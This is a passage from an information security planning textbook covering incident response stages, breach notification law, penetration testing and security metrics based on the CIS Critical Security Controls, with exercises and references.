An extended set of questions asks about the initial attack: How did the initial attack happen? What vulnerability enabled the original attack? When did this initial attack occur? Where did the attack originate from? Also important is what happened during the attack: Who was affected? What was the motivation for the attack? The initial attacker entry may be in a program or configuration error or opened phish or other vulnerability. To acquire root cause information, it is important to find the indicators (or symptoms of abnormal behavior) for the incident. Methods of analysis include using forensic tools, as discussed later in the Forensics chapter. Logs will need to be analyzed from different devices: operating system logs should indicate which accounts were accessed and when; and network devices may indicate any unusual ports. Internet Service Providers can assist by providing their logs regarding your network connection(s). The company whose software was attacked may be able to answer questions about error messages and codes, and provide help regarding their experience. Comparing baselines between a known good and attacked computer can pinpoint changes, by comparing expected files, file sizes, and file hashes for important files, and/or the set of active processes and connections when powered up. A forensic expert team (usually a private agency, but possibly law enforcement) can help to determine the scope of the attack and set of probable victims. Computer Emergency Response Team or CERT centers monitor incidents and are good sources of information for common and emergent threats. By working with these centers, your organization helps not only yourself but other organizations who encounter similar threats [5]. Agencies include for U.S.: www.cert.org and www.us-­cert.gov, and for Europe: www.enisa.europa.eu/activities/cert. Organizations subject to FISMA must report incidents to U.S. CERT. Once it is clear what happened, it is possible to remove the root cause. This will include rebuilding affected systems, updating the systems with recent patches and antivirus software, and fortifying defenses with enhanced security controls. Employees who were or may have been impacted should change their passwords on all their accounts. Finally, the rebuilt systems should be retested using vulnerability analysis tools.

252

13  Planning for Incident Response

Tables 13.3 and 13.4 shows incident response procedures to handle payment card incidents and malware detected by antivirus software. Some malware may simply install a backdoor, enabling the hacker to enter at will. Antivirus software may be smart enough to remove the backdoor. However, it certainly cannot predict what the attacker installed in the window of opportunity between the installation of the backdoor and the detection of malware by antivirus software. Therefore, it is important to understand the severity of the malware infection, although it is better to err on the side of rebuild. It is also important to understand whether the computer held protected confidential data, to determine whether the breach law may apply: even if the disk was encrypted, the operating system probably decrypted the data for the malware.

13.2.5 Step 5: Notification and Ex-post Response Stages (If Necessary) If a data breach of privacy has occurred, victims will need to be notified in an ‘expedient’ way [13]. In the U.S., according to Breach Notification Laws, protected information (or PII) includes for most states: social security number, driver’s license number, state identification card number, financial account number or credit or debit card number, or a financial number combined with any security/access code or password. Some states or HIPAA/HITECH regulation also protect medical or health insurance information, genetic information, birth date/place, and some login/passwords. Financial information is also protected by Gramm-Leach-Bliley Act [7]. Organizations adhering to FISMA must report incidents to US-CERT and keep data for 3 years [5]. It is required or recommended to report any breach to the state’s Attorney General, who may issue a lawsuit against any organization who does not notify in a timely manner [11]. There are many financial issues related to breaches, beyond the state government. Breach of contract civil suits may apply. In the U.S., the Federal Trade Commission (FTC) has brought civil suits against companies who do not provide sufficient privacy/security for their customers, resulting in an avoidable breach. This lawsuit generally argues that you advertised a privacy policy for your customers, which you did not follow up on [11]. In addition, class action lawsuits may be exacted, to compensate customers and/or shareholders (e.g., for disclosures not fully reported). For a data breach, a contact database of probable victims must be created. Notification may be delayed by law enforcement if an investigation is in progress. Using a consultant with experience in data breaches often saves companies money [6]. Working with a legal advisor can ensure that the law is fully met in developing and sending the breach notification letters to victims and regulators. Adopting a good public relations plan can also help to minimize customer churn, a major cost after a data breach. This often requires specialized training for remediation and call centers [3].

13.3  Preparing for Incident Response

253

Following the Notification stage, the Ex-Post Response stage is concerned with redress or reparation [6]. Activities may include: implementing a call center, reissuing new (e.g., financial) accounts, offering discounts, and paying for identity protection services and/or credit report monitoring [6]. Because of increased customer churn, organizations often take actions to repair their image and acquire new customers.

13.2.6 Step 6: Recovery and Lessons Learned Stages During the Recovery Stage, the organization restores operations to normal. The restored system should be fully tested before resuming operation. Once all is returned to normal, it is smart to learn from mistakes as part of the Lessons Learned stage. This stage should occur for major incidents, and perhaps quarterly or at least annually for minor events. What worked or caused problems during the incident response? Should the organization invest in additional detection or forensic analysis tools or training? Procedures can be corrected and expanded as part of process improvement. Security personnel should prepare a full Incident Report, which should include lost hours and incident costs, including costs of loss and handling. The report should be reported to stakeholders. Companies who have encountered data breaches consistently report implementing the following preventive controls (with perfect hindsight): implementing endpoint security software, improved identity/access control and/or security intelligence, training for security awareness, expanding use of encryption, improving security documentation and controls, adding tools for data loss prevention, etc. [2].

13.3 Preparing for Incident Response The most common reason for failure in incident response is lack of management support. Hopefully, with the easy method provided by this book, this will not be your problem. Let’s assume your IRP is written and approved by management. Congrats! However, there are still some things to do to prepare for an incident, including training, testing, revising the IRP, and (periodically) audit. There should be introductory training at or before the first day of IRT/IMT membership. Other forms of training may include mentoring via a senior member, formal training, and on-the-job training. Re-training is important when the IRP changes. A penetration test is where a (friendly), certified ethical hacker (CEH) is hired to attempt to penetrate a system and/or network through hacking, social engineering, and/or physical attacks. They will evaluate firewalls, servers, wireless and web technologies for common high-tech vulnerabilities; and use phishing, tailgating, social engineering phone calls (etc.) for low-tech vulnerabilities [14] – and then use street smarts the same way a criminal would to see what else might work. Finding

254

13  Planning for Incident Response

vulnerabilities through a friendly cracker is a lot cheaper than through a criminal stealing confidential data (and paying subsequent costs to forensic experts). The main difference between a ethical hacker ‘pen’ test and a criminal attack is written permission – and of course, consequences. Here are some different types of penetration tests [15]: • External Testing: Penetration tester tests from outside network perimeter. • Internal Testing: Tester tests from inside the network. • Blind Testing: Penetration tester knows nothing in advance and must do web/ news research on company. • Double Blind Testing: System/security administrators are not aware of the penetration test, in addition to the penetration tester having no previous knowledge. This test is useful for determining how effecting internal security is at recognizing and handling attacks. • Targeted Testing: Penetration tester has internal information about a target, and may have access to a user account. A penetration test is a wonderful method of audit. PCI DSS requires a qualified tester to perform an external and internal penetration test annually, as well as an incident response test to determine how the organization would respond to a serious attack [9]. Other ways to audit incident response is to ensure that the IRP is complete, approved and updated annually, that IRT/IMT members are comfortable and knowledgeable about their roles and responsibilities, and that incident response testing has been recently performed. For larger organizations, metrics help to evaluate incident response and the security organization’s effectiveness. Some recommended metrics include [4]: • • • • • • • •

Number of reported incidents (via human or external reports) Number of detected incidents (via IT/security tools) Average time to respond to incident (attain Containment Stage) Average time to resolve an incident (attain Recovery Stage) Total number of incidents successfully resolved Proactive and preventative measures taken Total damage (costs) from reported or detected incidents Total damage if incidents had not been contained in a timely manner

13.4 Questions and Problems 1. Vocabulary. Match each meaning with the vocabulary. Allowlist Triage Blind test Root cause

Endpoint security suite Vulnerability test Incident mgmt team Penetration test

Event or log management Incident response plan Incident response team Chain of custody

13.4  Questions and Problems

255

(a) A security tool for user computers, which features a firewall, antivirus and security configuration checking features. (b) A friendly ethical hacker is paid to find vulnerabilities. (c) A test to ensure that networked equipment can withstand common attacks. (d) A tool or process of analyzing computerized alarms or notifications. (e) A team of technical persons who will handle the incident, in combination with designated business management, public relations, legal and physical security persons. (f) A list of approved applications. (g) A penetration tester is given no insider knowledge or credentials before their attack. (h) The legal process of protecting evidence, by documenting all actions, working with a witness, and by not altering the evidence. (i) The stage of naming and categorizing the incident, prioritizing it, and assigning the handling of the incident to an appropriate handler. (j) The plan that guides IT and security about how to handle security incidents. (k) The vulnerability that enabled the attacker to enter the system. 2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook Incident Response Chapter to complete the tables. (a) Create one ‘High-level Planning for Incident Detection and Handling’ Table, similar to Table 13.2, listing five incident types. (b) Create two ‘Incident Handling Response Procedure’ Tables, similar to Table 13.3 or Table 13.4. (c) If you refer to a Procedure in (b), write a paragraph describing what steps should be taken, instead of writing a full procedure. 3. Vulnerability Root Cause. A forensic team is hired to analyze an expected infiltration. The team finds that an employee scanned computers on the local network until she found a Point of Sale (PoS) device. She found that the password to the PoS was the default password and installed spyware to record credit card numbers. The result was a sudden increase in traffic sent over the Internet. The slowdown caused management to become suspicious. They called in an IT specialist to investigate. The IT specialist saw unrecognizable packets coming from the PoS, and recommended the forensic team. (a) What is the root cause(s) of the vulnerability? (b) What mitigation strategies shall be used to fix the vulnerabilities? 4. Incident Response Tool Evaluation. Select an incident response tool to evaluate. What capabilities does this tool have? What devices or operating systems does it analyze? How much does it cost? Can it be used legally? Write a description of this tool.

256

13  Planning for Incident Response

5. Investigate CERT web sites. What information is available at a CERT website? Look at the links and documents that are available at the site and write a description of what information is provided, including how you think the information could be used. Here are some sample sites: (a) U.S.: www.cert.org and www.us-­cert.gov (b) Europe: www.enisa.europa.eu/activities/cert (c) International: www.sans.org 6. Recent Incident Reports. This textbook refers to security reports from the year the book was written. Some statistics have certainly changed by the time you read this. What are some of the most recent statistics, according to Pomenom, Verizon, NIST, or Symantec reports? Search for a recent Breach Report or Security Report and document 15 updated statistics from that report. 7. Recent Regulation: Look up recent news reports on laws from any nation at: www.huntonprivacyblog.com. Your instructor may provide additional resources. What recent legal issues did you find?

13.4.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Planning for incident response

Health first case study ✓

Other resources Security workbook

References 1. Perlroth N (2020) This is how they tell me the world ends. Bloomsbury Publishing, New York 2. 2014 cost of data breach study: United States (2014) Ponemon Institute LLC, Traverse City, May 3. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise. com/DBIR/2013. Accessed 20 Oct 2013 4. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights 5. Cichonski P, Millar T, Grance T, Skarfone K (2012) NIST special publication 800-61 Rev 2 computer security incident handling guide. National Institute of Standards and Technology, Gaithersburg, August 6. Ponemon (2013) Cost of data breach study: United States. Pomenon Institute LLC, Traverse City, pp 1–22, May 7. Murdoch D (2014) Blue team handbook: incident response edition, v. 2.0. www.vmit.com 8. SANS (2013) Critical controls for effective cyber defense, version 4.1, March. www.sans.org

References

257

9. Payment Card Industry (2013) Requirements and security assessment procedures, ver. 3.0, November. www.pcisecuritystandards.org 10. Gibson D (2011) Managing risk in information systems. Jones & Bartlett Learning, Burlington, pp 392–418 11. Thompson L (2013) Privacy: the tidal waves of the future. In: ISACA chapter meeting. ISACA, Rosemont, 13 December 12. Brelsford E (2013) 2014: a cyber odyssey. In: ISACA Chicago chapter meeting. ISACA, Rosemont, 13 December 13. National Conference of State Legislatures (2014) Security breach notification laws. http:// www.ncsl.org/research/telecommunications-­and-­information-­technology/security-­breach-­ notification-­laws.aspx. Accessed 20 Aug 2014 14. Walker M (2012) All-in-one CEH™ certified ethical hacker exam guide. McGraw-Hill Co, New York 15. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 379–381 16. Ali KM (2012) Digital forensics: best practices and managerial implications. In: 2012 fourth international conference on computational intelligence, communication systems and networks, IEEE Computer Society, pp 196–199. http://ieeexplore.ieee.org 17. Brown CLT (2006) Computer evidence: collection & preservation. Charles River Media, Newton Centre, pp 16–17, 28 18. Cowen D (2013) Computer forensics: InfoSec pro guide. McGraw-Hill Co, New  York, pp 257–282 19. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 461–488 20. Philipp A, Cowen D, Davis C (2010) Hacking exposed™ computer forensics, 2nd edn. McGraw-Hill Co, New York, pp 341–368 21. Giles S (2012) Managing fraud risk: a practical guide for directors and managers. Wiley, Chichester, pp 255–293 22. IBM (2021) Cost of a data breach report 2021. IBM, Armonk 23. IBM (2022) Cost of a data breach report 2022. IBM, Armonk 24. ISACA (2021) CISM exam preparation class. Chicago Chapter ISACA, Fall 2021 25. European Union (2018) General data protection regulation (GDPR). https://gdpr-­info.eu 26. MasterCard (2019) Account data compromise event management best practices, 26 February 2019 27. Jarrett H M, Bailie M W, Hagen E, Eltringham S (eds) (n.d.) Prosecuting computer crimes. Office of Legal Education, Computer Crime and Intellectual Property Section, Criminal Division. From: https://www.justice.gov/criminal/file/442156/download 28. Verizon (2022) Verizon 2022 data breach investigations report. https://www.verizon.com/ business/resources/reports/dbir. 29. Easttom C (2019) System forensics, investigation, and response, 3rd edn. Jones & Bartlett Learning, Burlington. 30. Messier R (2017) Network forensics, John Wiley and Sons Inc. Indianapolis IN. 31. ISACA (2021) CISM Review Class, Chicago Chapter, Fall 2021 32. Visa (2022) What to do if compromised, version 7.0, Effective 15 August 2022

Chapter 14

Defining Security Metrics

If we went in with a drone and knocked out a thousand centrifuges, that’s an act of war. But if we go in with Stuxnet and knock out a thousand centrifuges, what’s that? – Richard Clarke, counterterrorism czar for 3 U.S. presidents. [7]

How do you know how well you are doing, unless you have metrics to tell you? Metrics provide decision support in running an organization. When an organization establishes a set of metrics, the organization can get a realistic baseline, or view, of how it performs at a point in time. Future metrics then determine whether performance improves with new controls. For security organizations, metrics are a way to regularly monitor how well security controls, the security organization, and the organization as a whole are performing relative to security goals. In fact, ISACA’s CISM Review Manual [3] suggests: “Key controls that cannot be monitored pose an unacceptable risk and should be avoided” [p 194, 3]. There are two popular approaches to metrics: business-driven and technology-­ driven. The business-driven approach states that the business has particular risks, as addressed by risk management, and the focus of attention should be concerned with how well the organization is performing relative to these risks [3]. Thus, metrics inform management (and independent auditors) of the effectiveness of the security program. Business-driven metrics have the advantage that they are tailored to the particular circumstances of the organization, and can be designed to measure adherence to control objectives. One thought worth considering is that monitoring achievement of control objective is more important than perfecting security procedures. Following this idea, measuring informs us when we have sufficient or inadequate security, and where improvements must be made. A technology-driven approach to metrics uses security expert consensus and CERT-based data to help understand the current level and types of security threats. The basic idea is: what criminal attacks are emerging that we are prone to? A tech-­ driven approach would argue that many incidents go undetected for months and are caught by outside organizations  – thus, building sufficient security is necessary before assuming any metrics may actually even be valid. The tech-driven approach to metrics can be a checklist of best-practices goals to attain. Both aspects are highly relevant and compatible and should be used to update risk analysis and drive metrics. Both metric types are discussed in two different sections of this chapter. While metrics are not absolutely necessary for the average © The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_14

259

260

14  Defining Security Metrics

small organization, any organization that is subject to regulation (e.g., HIPAA, SOX, FISMA) should take this section very seriously. In fact, most organizations would benefit from a few carefully selected metrics, particularly after a minimum baseline of security is implemented. Metrics require multiple stages: defining, monitoring, acting on results, and re-­ evaluating metrics based on changing risks [3].

14.1 Implementing Business-Driven Metrics Metrics are part of the Monitoring and Compliance function, and help to indicate whether controls and compliance are effective or not. A programmer or system administrator can help to automate the collection of computer-generated metrics. Management monitors a series of metrics, each with different aims [2, 3]: Key Goal Indicators (KGI)  Management defines strategic goals for the organization, and to determine whether they are achieving these goals, they define and monitor specific metrics. For example, a goal may be regulatory compliance, which requires defined gap analysis of where we are versus where management defines we should be. Key Performance Indicators (KPI)  Once a goal is defined, the goal may be broken down into factors or steps to achieve that goal. Measurement of those steps are called performance indicators. Key Risk Indicators (KRI)  These metrics that are highly relevant to monitoring high priority risks. They are capable of indicating a probability or trend of the actual status of risks [2]. KRIs provide organizations a more accurate guide for the future, enabling them to meet strategic goals. KRIs also enable an evaluation of past performance, allowing organizations to learn about their actual risk appetite. Business management is not interested in the number of attacks handled by each firewall every week – nor are technical people interested in security cost metrics. Therefore, security metrics can be categorized into three levels, depending on the intended audience [3]. Strategic metrics are of interest to executive management, who are interested in risk (ALE), budget, and policy (e.g., regulatory compliance), as well as major results such as disaster recovery test results. Tactical or management metrics determine the effectiveness of the security program, and include rates of policy compliance/non-compliance and exceptions, incident management effectiveness, and risk changes resulting from system changes. Operational metrics tend to be technical and of interest to the security staff, and include firewall, IDS, or system log analysis, vulnerability test results, and patch management status. The reporting interval for metrics varies for each metric category. Strategic metrics may be discussed annually or semiannually. Tactical metrics show trends and

261

14.2  Implementing Technology-Driven Metrics

may be discussed every 6 months or so. Operational metrics are discussed weekly or monthly, and are preferably automated [3]. Business-oriented metrics consider the needs of the business first. This three-step process helps consider the most important threats, how to measure those threats, and how to report on them: Step 1: What are management’s goals and the most important security risks to monitor in your organization? What threats and compliance requirements are of most concern? Review your risk plan and policies to help define the most important areas to monitor. Step 2: After listing your most important goals and risks, consider which metrics make the most sense to collect and monitor. Since automated metrics are doable in a busy world, can these metrics be automatically collected? Step 3: Consider the three perspectives of strategic, tactical and operational metrics, relative to the three audiences. Major risks in a university environment include a lunatic gunman, data breach, a cracking attempt and web failure. Metrics developed from these risks are shown in Table 14.1. Starting with a small number of metrics is useful until metrics generation can be automated. Table 14.2 shows sample metrics for various categories of a security program [3, 6]. This list of potentially useful metrics includes cost, program, and risk-oriented metrics.

14.2 Implementing Technology-Driven Metrics Technology-driven metrics use defensive techniques to counter known attacks. Technology-driven metrics are derived by security experts and tend to be operational in nature. Table 14.1  Selected metrics for Einstein University (workbook exercise) Category Strategic Tactical

Metric Cost of security/terminal Cost of incidents % employees passing info security quiz % employees completing info security (& FERPA) training

# Hours Web unavailable Operational # illegal packets in confidential zone # malware infections

Calculation & collection method Information Tech. Group Incident Response totals Annual email requesting testing

Period of reporting 1 year 6 months 6 months

One annual training with sign-in. Performance review for key personnel Incident Response database Log management database

6 months

Incident Response database

1 month

3 months 1 week

14  Defining Security Metrics

262 Table 14.2  Example metrics Risk: The aggregate ALE % of risk eliminated, mitigated, transferred # of open risks due to inaction Operational performance: Time to detect and contain incidents Quantity & severity of incidents % of systems audited in last quarter Technical security architecture: # of malware identified and neutralized Types of compromises, by severity & attack type Attack attempts repelled by control devices Volume of messages, KB processed by communications control devices Security management framework: Completeness and clarity of security documentation Inclusion of security in each project plan Rate of issue recurrence Secure software development: Rate of projects passing compliance audits Percent of development staff certified in security Rate of teams reporting code reviews on high-risk code in past 6 months

Cost effectiveness: Cost of workstation security per user Cost of email spam and virus protection per mailbox Organizational awareness: % of employees passing quiz, after training vs. 3 months later % of employees completing training Security process monitoring: Last date and type of BCP, DRP, IRP testing Last date asset inventories were reviewed & updated Frequency of executive management review activities compared to planned Compliance: Rate of compliance with regulation or policy Rate of automation of compliance tests Frequency of compliance testing

Highly respected set of controls with metrics is provided by CIS [1], with some interesting metrics from a SANS document [5]. The CIS document is called: “CIS Critical Security Controls” [1]. This set of 18 controls was developed to defend against criminal organization attacks and nation-state spying. One goal is to automate checks at least weekly and preferably daily for metrics. The summary below outlines minimum requirements and are listed in CIS [1] priority order, with some enhancements from other sources. 1. Inventory of Authorized Devices: Ensure all devices that are on your network are known, configured properly, and recently patched. Everything with an IP address is inventoried and controlled. The inventory shall include: IP address, hardware (e.g., MAC) address, machine name, asset owner and department [1]. • Tool: Automate network scanning for daily or weekly execution and/or use DHCP reports and passive monitoring. Compare results daily or weekly with known good configurations. • Metric: Monitor of unauthorized devices weekly (or daily). May test by temporarily placing an unauthorized device on the network [8]. 2. Inventory of Authorized and Unauthorized Software: Ensure all software is inventoried, approved and recently patched. Inventory includes software name,

14.2  Implementing Technology-Driven Metrics

263

source/publisher, install date, version, deployment mechanism, and applicable license information. • Tool: Use allowlisting tools, where an allowlist defines the permitted list of software. Endpoint Security Suites (ESS) often contain antivirus, antispyware, firewall, IDS/IPS, and software allow- and blocklisting. A blocklist defines software that is not allowed on specific systems (e.g., IT tools). ESS tools generate alerts if unapproved software is installed. • Metric: Review inventory allow and blocklisting at least bi-annually. Inspect for unauthorized software at least monthly [1]. May test by temporarily installing unauthorized software on a device and measuring delay time to find and remove [8]. 3. Management of Protected and Sensitive Data: Define standards for data handling, retention, disposal, access permissions, encryption, logging of accesses, monitoring of logs. • Metric: Reevaluate inventory annually or with significant changes. 4. Secure Configurations for Hardware and Software: All devices are hardened using recommended security configurations (e.g., CIS Benchmarks, NIST checklists). Hardening includes the establishment of patched baselines for software and devices (including network devices.) Hardening also includes enabling firewalls, using encryption, session locking and complex passwords, minimizing default accounts, restricting services, and remote wiping of missing devices [1]. • Tools: Build secure images, and use configuration checking tools daily [8]. • Metric: Review secure configurations annually [1]. May test by temporarily attempting to change a set of random configurations and measuring delay time to find and fix [8]. 5. Account Monitoring and Control: Maintain an inventory of valid accounts, including persons’ name, user name, start/expiration dates, and department. Terminated accounts are removed in a timely manner, via account expiration dates, or as a result of logs of expired password accounts, disabled accounts, or locked-out accounts. Passwords are unique. Avoid using system admin accounts for non-admin work [1]. • Tools: Operating system tools to generate alerts for the above conditions should be enabled. • Metric: Review of accounts quarterly for validity [1]. A list of valid user accounts is collected daily; an alert or email is generated for unusual changes [8]. 6. Controlled Access Based on Need to Know: Data classification schemes and logging access to confidential data help prevent exfiltration of data to potential competitors. Separate accounts for email/web access versus privileged access

264

14  Defining Security Metrics

(e.g., administrator). Multifactor authentication is used particularly for privileged or admin accounts [1]. • Tools: Fine-tuned authentication, role-based access control, multifactor authentication and network zoning. • Metric: Unauthorized accesses generate an alert with 24 h or preferably less time [8]. Revoke or disable terminated accounts within limited time frame [1]. 7. Continuous Vulnerability Assessment and Remediation: Vulnerabilities are published regularly (e.g., through CVE, CCE, CPE). It is critical to learn which of your software and devices are susceptible to the vulnerabilities, and correcting them before criminals access them [1]. Run vulnerability scans on all systems at least weekly [8]. Problem fixes are verified through additional scans. • Tools: Vulnerability scanning tools, which are updated: wireless, server, endpoint, etc. • Metric: Review vulnerability scanning plan annually [1]. Perform patch management at least monthly [1]. Vulnerability notification(s) are emailed within 1 h of completion of a vulnerability scan [8]. 8. Management of Audit Logs: Logs are important to detect attacks and to forensically analyze attacks. Logs include system logs, which report on OS and network events; and audit logs, which report on user events and transactions. Logs are write-only, forwarded to a centralized log server, and archived for at least 90 days [1]. • Tools: Logs are verbose and 90 days’ worth of space is allocated for them. SIEM tools help in analyzing alerts. • Metric: To test, ensure that the centralized log server is receiving logs from each inventoried device periodically. Log specifications are inspected annually. Time synchronization ensures logs are synchronized. Logs are reviewed at least weekly or more frequently [1]. 9. Email and Web Browser Protections: One primary method for criminals to enter an organization is through malware or social engineering, using email and the web. Criminals abuse vulnerabilities within browsers and browser plug-ins. Therefore, it is crucial that browser software remains supported and patched, and pop-ups are disabled [1]. Users should be trained to recognize and report phishing attempts. • Tools: To protect email, tools can restrict spam, scan for malware, and restrict uncommon file type extensions. To protect web accesses, block potentially dangerous websites. • Metric: Periodically ensure blocked websites remain blocked. Test that unauthorized browsers are found and removed. Periodically ensure that unauthorized file types are removed within email [1].

14.2  Implementing Technology-Driven Metrics

265

10. Malware Defenses: Malware is used to steal or destroy data, capture credentials, and traverse organizational networks, etc. Antivirus/antispyware is updated and run against all data, including shared files, server data, and removeable media. Antivirus software is managed centrally and logs inappropriate actions or attacks [1]. Additional controls to be considered include blocking social media, limiting external devices (e.g., USB), using web proxy gateways, and monitoring networks [5]. • Tools: Anti-malware or endpoint security suites, which have the additional capability of reporting that tool is updated and activated on all systems [8]. • Metric: If benign malware (e.g., security/hacking tool) install is attempted, antivirus either prevents installation or execution or quarantines software, and then sends an alert or email report within 1 h of installation [8]. Antimalware is installed on all organizational devices and software automatically updates itself within a set timeframe [1]. 11. Data Recovery Capability: Criminals can alter configurations, programs or data, or demand ransoms, making data unavailable or untrustworthy. Backups are maintained at least weekly and more often for critical data. Backups are encrypted and securely stored. Multiple staff can perform backup/recovery [8]. • Metric: Test backups (at least) quarterly for a random sample of systems. This includes operating system, software, and data restoration. The recovery documentation is reviewed annually and with changes. Backups are run weekly or more frequently [1]. 12. Secure Configurations for Network Devices: Default configurations are configured for ease-of-use, and must be re-configured for security [1]. A configuration database tracks approved configurations in configuration management for network devices, including firewalls, wireless access points, routers, and switches. Communications protocols shall be of recent versions and use encryption. Network software is patched and end-of-life devices are upgraded or include mitigating controls [1]. Multifactor identification is required for controlling network devices; login to authentication server is required to access VPN or organizational devices. • Tools: Tools can perform rule set sanity checking for network filter devices, which use Access Control Lists. Network devices should implement segmentation [8]. • Metric: A network architecture is fully documented and updated at least annually or as the network changes [1]. To test, any change to the configuration of a network device is recognized within 24 h [8]. 13. Network Attack and Log Monitoring: Because criminals are often in an organization’s networks for months before discovery, it is important to be able to detect and track attacks. Building up threat intelligence skills includes learning to recognize and document attacker techniques. Recognition of threats via Security Information and Event Management (SIEM) and automatic handling

266

14  Defining Security Metrics

of threats, via Intrusion Prevention Solution (IPS), is beneficial but event thresholds must be tuned at least monthly. Filtering between network zones is required to segment networks. • Tools: If inhouse intrusion detection is not possible, security consultants or a managed service provider should be hired. HIDS/HIPS, NIDS/NIPS, and application layer firewalls or proxies can catch attacks, and a centralized log analysis tool, like a SIEM, can aid in analyzing logs [1]. Automate port scanning for daily or periodic execution, monitoring for open services and versions of those services. Wireless IPS detect available wireless access points and deactivate rogue access points. Vulnerability scanners can detect unauthorized wireless access points connected to the Internet [8]. • Metric: Compare port scanning results daily with known good configurations. To test, temporarily place a secure test service randomly on the network, which will respond to network requests [8]. The system can detect a rogue access point or unauthorized device within 1 h or day. 14. Security Awareness Skills Training: Security awareness training is required for all end users, but executive management often handles more proprietary information, system administrators have privileged system access, and finance, contracts and human resources have specialized access to information or money [1]. Software developers also should be aware of safe programming practices [8]. • Tools: Annual training and phishing tests [1] (In addition to Chap. 1, also see NIST SP800-50, National Cyber Security Centre, National Cyber Security Alliance, or SANS). • Metric: Update social engineering training annually [1]. Test security awareness understanding in training; attempt periodic social engineering tests using phishing emails and phone calls [8]. 15. Management of Service Providers: Most organizations use third-party agreements to implement various services; these providers may in turn use other parties. Contracts with providers should ensure specific security, privacy and regulatory controls and requirements, monitoring provisions, incident response, and contract termination clauses, including data disposal [1]. • Tools: Third-party assessment platforms can evaluate service providers technical assessment and risk rating [1]. • Metrics: Annual review of service provider inventory. Annual review of contractor certifications and performance [1]. 16. Application Software Security: Attackers attack through password credentials, application vulnerabilities or network/system hacking. Design includes threat modeling. New application software is tested for security vulnerabilities, including buffer overflow, SQL injection, cross-site scripting, cross-site request forgery, clickjacking of code, field overflows, and performance during DDOS attacks [8]. Standardized OS utilities include identity management, encryption,

14.2  Implementing Technology-Driven Metrics

267

and logging: reports error messages to log system [1]. Configuration requirements include application firewalls and hardened databases or application infrastructure. Separate developer/production environments. • Tools: Automated testing includes static code analyzers, automated web scanning tools and automated database configuration review tools; security training for programmers [8]. Developer standards include secure application design and coding standards, change control tools, software defect severity rating system [1]. • Metric: An attack on the software generates a log or email within 24 h (or less). Automated web scanning occurs weekly or daily. When errors are found, they are fixed within 15 days [5]. Annual review of inventory of third-­ party software [1]. Annual security training for developers. 17. Incident Response and Management: An Incident Response Plan defines which roles should perform what under various conditions [8]. Threat intelligence and/or threat hunting can enable a team to be proactive in detecting attacks [1]. • Tools: Incident response plan, communication plan (during security incident). • Metrics: Annually review: incident response plan, personnel roles (i.e., incident management team, incident response team, emergency contact list, training to report incidents) [1]. Perform incident response testing at least annually. Update thresholds distinguishing events from incidents at least annually or when significant changes occur. Perform post-incident review to update documentation on as needed basis. 18. Penetration Testing: These are useful to test control validation: proper operation of controls; test control verification: that controls are designed sufficiently to meet needs; or to demonstrate proof of inadequacy of controls. Penetration testing is usually performed by expert outsiders to determine the level that vulnerabilities can be exploited [1]. An internal penetration test program evaluates what penetration testing should occur for various aspects of the organization. Pen test results are remediated. • Tools: expert consultants often manually use custom scripts. Rules of engagement specify the testing times, duration, and overall test approach [1]. • Metric: Perform external pen testing at least annually; perform internal pen testing at least annually [1]. Further details on these 18 recommended controls can be found at CIS Critical Security Controls from www.cis.org. Many measures tend to be pass-fail tests. It is expected that time durations for vulnerability and other checks would be set to what an organization can accomplish and durations would be reduced to safer intervals, when possible. Advanced organizations should shorten timeframes to 24 h and less. Actually analyzing incident response performance would include statistics such as measuring the ‘number of compromised systems’ and ‘mean time to detection’. [9] If fraud is a factor in your organization, fraud-related statistics include [4]:

268

14  Defining Security Metrics

• False alarm rate or false positive rate: percent of legitimate transactions that are incorrectly interpreted as fraudulent. • False negative rate: percent of fraudulent transactions that are incorrectly interpreted as legitimate. • Fraud catching rate or true positive rate: percent of fraudulent transactions that are correctly recognized as fraudulent.

14.3 Questions and Problems 1. Business-Driven Metrics for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook Metrics Chapter to complete the three questions and one table. For each table, include two or more metrics for each of the strategic, tactical and operational levels.

(a) Step 1 Question: What are the most important security areas to monitor in this organization? What threats and regulation are the greatest concern? Review risk results and policies to help define the most important areas to monitor. (b) Step 2 Question: After listing the most important threats, consider which metrics make the most sense to collect. Since automated metrics are doable in a busy world, is there an easy way to collect these metrics? (c) Step 3 Question: Consider the three perspectives of strategic, tactical and operational metrics, relative to the three audiences. (d) Create a ‘Metrics’ Table, similar to Table 14.1. 2. Tech-Driven Metric Alerts. Review the technology-driven metrics requirements for alerts or emails to be generated. Prepare a list of the required alerts/emails to be fully compliant with the top-18 CIS controls. Then put a check next to the metrics you think would be most important for your company. 3. Regulation relating to Metrics. Consider one of the following security regulations or standards: PCI DSS or EU’s GDPR or USA’s HIPAA, Gramm–Leach– Bliley, Sarbanes–Oxley, or FISMA. What metrics may help in monitoring for compliance? Develop five metrics that will help test for regulatory compliance. Websites that provide government- or standards-based information as authentic sources of information include: (a) PCI DSS: Access information from https://www.pcisecuritystandards. org/security_standards/. Select the PCI DSS standard. Skim the “Detailed PCI DSS Requirements and Testing Procedures”, (starting on page 37 of version 4.0.) (b) General Data Protection Regulation: Chap. 17 of this text or https:// gdpr-­info.eu.

References

269



(c) HIPAA/HITECH: Chap. 15 of this text or www.hhs.gov (Health and Human Services) and search for HIPAA. (d) Gramm–Leach–Bliley and Red Flags Rule: Federal Trade Commission: http://www.business.ftc.gov/privacy-­and-­security (e) Sarbanes–Oxley: www.isaca.org (Organizations for standards/security) Your instructor may provide ‘Information Security Student Book: Using COBIT®5 for Information Security’, available at www.isaca.org. Additional information is at www.sans.org, search for ‘COBIT’. (f) FISMA: www.nist.gov (National Institute for Standards and Technology) and search for FISMA. Specific link: http://www.nist.gov/itl/csd/soi/fisma. cfm. Access FIPS Publication 200 first.

